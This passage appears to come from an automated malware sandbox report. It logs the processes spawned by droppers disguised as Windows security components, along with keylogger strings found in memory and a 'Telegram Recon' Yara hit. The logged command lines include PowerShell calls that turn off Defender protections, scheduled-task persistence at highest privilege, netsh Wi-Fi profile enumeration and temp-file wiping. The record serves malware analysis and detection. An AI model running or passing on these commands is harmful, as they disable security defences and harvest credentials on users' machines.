                            Source: C:\Users\user\AppData\Roaming\update.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\Window Security.exe" /rl HIGHEST /f
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe "C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe"
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-MpPreference -verbose
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b del /q/f/s %TEMP%\* & exit
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender Service Host" /tr "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe "C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe" /rl HIGHEST /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 4
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Dol1ysW8Xfj9.bat" "
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K del /q/f/s C:\Users\user\AppData\Local\Temp\*
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Window Security.exe "C:\Users\user\AppData\Roaming\Window Security.exe"
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\CMaYLAcPq0sZ.bat" "
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Window Security.exe "C:\Users\user\AppData\Roaming\Window Security.exe"
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Q83dEbLbhfIH.bat" "
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                            Source: Windows Security.exe, 00000010.00000002.4466012118.0000000002628000.00000004.00000800.00020000.00000000.sdmp, Windows Security.exe, 00000010.00000002.4466012118.0000000002631000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <meta http-equiv='Content-Type' content='text/html; charset=utf-8' />Log created on 03.09.2024 00:16<br><br><style>.h { color: 0000ff; display: inline; }</style><p class="h"><br><br>[<b>Program Manager - 00:17</b>]</p><br><p class="h">[Win + R]</p><p class="h">[Win + R]</p>
                            Source: Windows Security.exe, 00000010.00000002.4466012118.0000000002598000.00000004.00000800.00020000.00000000.sdmp, Windows Security.exe, 00000010.00000002.4466012118.0000000002631000.00000004.00000800.00020000.00000000.sdmp, Windows Security.exe, 00000010.00000002.4466012118.0000000002622000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                            Source: Windows Security.exe, 00000010.00000002.4466012118.0000000002598000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-]q
                            Source: Windows Security.exe, 00000010.00000002.4466012118.0000000002631000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <meta http-equiv='Content-Type' content='text/html; charset=utf-8' />Log created on 03.09.2024 00:16<br><br><style>.h { color: 0000ff; display: inline; }</style><p class="h"><br><br>[<b>Program Manager - 00:17</b>]</p><br><p class="h">[Win + R]</p><p class="h">[Win + R]</p><p class="h">[Win + R]</p>@\]qTe]qtbc
                            Source: Windows Security.exe, 00000010.00000002.4466012118.0000000002628000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qq<p class="h"><br><br>[<b>Program Manager - 00:17</b>]</p><br><p class="h">[Win + R]</p><p class="h">[Win + R]</p>
                            Source: Windows Security.exe, 00000010.00000002.4466012118.0000000002628000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `,]qa><br>[<b>Program Manager - 00:17</b>]</p><br><p class="h">[Win + R]</p><p class="h">[Win + R]</p>
                            Source: Windows Security.exe, 00000010.00000002.4466012118.0000000002628000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <meta http-equiv='Content-Type' content='text/html; charset=utf-8' />Log created on 03.09.2024 00:16<br><br><style>.h { color: 0000ff; display: inline; }</style><p class="h"><br><br>[<b>Program Manager - 00:17</b>]</p><br><p class="h">[Win + R]</p><p class="h">[Win + R]</p>@\]qTe]ql
                            Source: Windows Security.exe, 00000010.00000002.4466012118.0000000002628000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qq<p class="h"><br><br>[<b>Program Manager - 00:17</b>]</p><br><p class="h">[Win + R]</p><p class="h">[Win + R]</p>LR]q
                            Source: Windows Security.exe, 00000010.00000002.4466012118.0000000002631000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <meta http-equiv='Content-Type' content='text/html; charset=utf-8' />Log created on 03.09.2024 00:16<br><br><style>.h { color: 0000ff; display: inline; }</style><p class="h"><br><br>[<b>Program Manager - 00:17</b>]</p><br><p class="h">[Win + R]</p><p class="h">[Win + R]</p><p class="h">[Win + R]</p>
                            Source: Windows Security.exe, 00000010.00000002.4466012118.0000000002631000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <meta http-equiv='Content-Type' content='text/html; charset=utf-8' />Log created on 03.09.2024 00:16<br><br><style>.h { color: 0000ff; display: inline; }</style><p class="h"><br><br>[<b>Program Manager - 00:17</b>]</p><br><p class="h">[Win + R]</p><p class="h">[Win + R]</p>@\]q@
                            Source: Windows Security.exe, 00000010.00000002.4466012118.0000000002598000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q=<p class="h"><br><br>[<b>Program Manager - 00:17</b>]</p><br>LR]q
                            Source: Windows Security.exe, 00000010.00000002.4466012118.0000000002598000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `,]q-><br>[<b>Program Manager - 00:17</b>]</p><br>

                            Language, Device and Operating System Detection

                            barindex
                            Yara detected Telegram Recon
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                            Source: C:\Users\user\Desktop\BTC.exeQueries volume information: C:\Users\user\Desktop\BTC.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeQueries volume information: C:\Users\user\AppData\Roaming\crack.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeQueries volume information: C:\Users\user\AppData\Roaming\Cracked.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\update.exeQueries volume information: C:\Users\user\AppData\Roaming\update.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeQueries volume information: C:\Users\user\AppData\Roaming\Window Security.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeQueries volume information: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeQueries volume information: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeQueries volume information: C:\Users\user\AppData\Roaming\Window Security.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeQueries volume information: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
